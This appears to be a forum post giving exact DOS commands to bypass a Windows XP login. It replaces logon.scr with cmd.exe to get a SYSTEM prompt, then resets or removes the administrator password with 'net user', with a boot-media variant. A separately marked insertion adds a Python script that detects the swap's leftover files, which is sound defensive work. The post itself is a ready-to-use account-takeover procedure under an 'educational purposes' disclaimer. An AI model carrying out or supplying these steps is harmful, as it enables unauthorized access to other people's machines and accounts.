Log into a limited account on your target machine, open a DOS prompt, and enter this set of commands exactly:
c:\cd\ *drops to root
c:\cd\windows\system32 *directs to the system32 dir
c:\mkdir temphack *creates the folder temphack
c:\copy logon.scr temphack\logon.scr *backs up logon.scr
c:\copy cmd.exe temphack\cmd.exe *backs up cmd.exe
c:\del logon.scr *deletes original logon.scr
c:\rename cmd.exe logon.scr *renames cmd.exe to logon.scr
c:\exit *quits dos
What you have just done is back up the command program and the screen saver file, then put the command program in the screen saver's place, so that when the machine starts the screen saver you get an unprotected DOS prompt without logging into XP.
Once this happens, enter this command, minus the quotes:
"net user password"
If the Administrator account is called Amit and you want the password blahblah, enter this:
"net user Amit blahblah"
BUT
In case:
If you aren't able to get into DOS and create such files, then you have a second alternative. But before I go into the subject, I want to let you know something about what I faced while I was sitting in front of my computer the whole day before I finally found the way.
At first, I had a Windows XP OS, "Dark edition rebirth Sp3", whose administrative authority is already pre-installed after you finish setting up your OS. That means you cannot delete it even after creating another new administrator user, which means I cannot create such files using another limited account.
Second, even if I restart, press F8 and try to enter "Safe mode command prompt", it will ask for the administrative password. So it seems impossible to get through it.
Third, I used the same OS bootable DVD and there was an option to enter DOS, i.e. NTFS4DOS, which was my master key to enter a DOS system without any administrator authority...(bingoooo)
I just did the same thing that is mentioned in the above lines, and what I explored was awesome. Guess what???
whole day of hard work..#:-s
I will give a revised version below for your convenience:
This is the same thing as above...
You just have to manage to get into DOS directly after restarting. (If you have a bootable DOS device or a bootable OS CD/DVD and it lets you in, then it's perfect for this method.)
c:\cd\ *drops to root
c:\cd\windows\system32 *directs to the system32 dir
c:\mkdir temphack *creates the folder temphack
c:\copy logon.scr temphack\logon.scr *backs up logon.scr
c:\copy cmd.exe temphack\cmd.exe *backs up cmd.exe
c:\del logon.scr *deletes original logon.scr
c:\rename cmd.exe logon.scr *renames cmd.exe to logon.scr
Press ALT+CTRL+DEL
-Press F8
-Enter any safemode option
-open control panel
-open user accounts
-Select Administrator
-Remove Password
-Restart
And there you are in without any password...:)
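The file swap above leaves artifacts that a defender can look for in a system32 directory, for instance on a mounted disk image. The following Python check is an added example and not part of the original post; the function names and the stand-in sample files are assumptions, while logon.scr, cmd.exe and temphack are the names used above.

```python
import hashlib
import os
import tempfile

def sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def audit_system32(system32):
    """Return findings for the logon.scr / cmd.exe swap described above."""
    findings = []
    scr = os.path.join(system32, "logon.scr")
    cmd = os.path.join(system32, "cmd.exe")
    backup = os.path.join(system32, "temphack")  # folder name used on this page
    if os.path.isdir(backup):
        findings.append("backup folder temphack present")
    if not os.path.isfile(cmd):
        findings.append("cmd.exe missing from system32")
    if not os.path.isfile(scr):
        findings.append("logon.scr missing")
        return findings
    # The swap makes logon.scr a byte-for-byte copy of the command shell,
    # so compare it with every cmd.exe copy that can be found.
    scr_hash = sha256(scr)
    for copy in (cmd, os.path.join(backup, "cmd.exe")):
        if os.path.isfile(copy) and sha256(copy) == scr_hash:
            findings.append("logon.scr is byte-identical to "
                            + os.path.relpath(copy, system32))
    return findings

def build_sample(tampered):
    """Constructed sample tree; contents are stand-in bytes, not real binaries."""
    root = tempfile.mkdtemp()
    def write(rel, data):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    if tampered:
        write("temphack/logon.scr", b"SCREENSAVER")
        write("temphack/cmd.exe", b"COMMAND-SHELL")
        write("logon.scr", b"COMMAND-SHELL")
    else:
        write("logon.scr", b"SCREENSAVER")
        write("cmd.exe", b"COMMAND-SHELL")
    return root

if __name__ == "__main__":
    for finding in audit_system32(build_sample(tampered=True)):
        print(finding)
```

Because the revised procedure writes these files from boot media, run the check from a trusted environment against the mounted volume rather than from the installation being examined.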
At last,
However, I have tried to make my flash drive bootable with DOS so that it would be easier to start with, but I couldn't. So, if there is someone else out there who knows or who can find out a way to get in, please inform us over here. Thank you.
Warning!
This is just for educational purposes. We will not be responsible for any harm or loss to the users. Users are responsible for their own actions.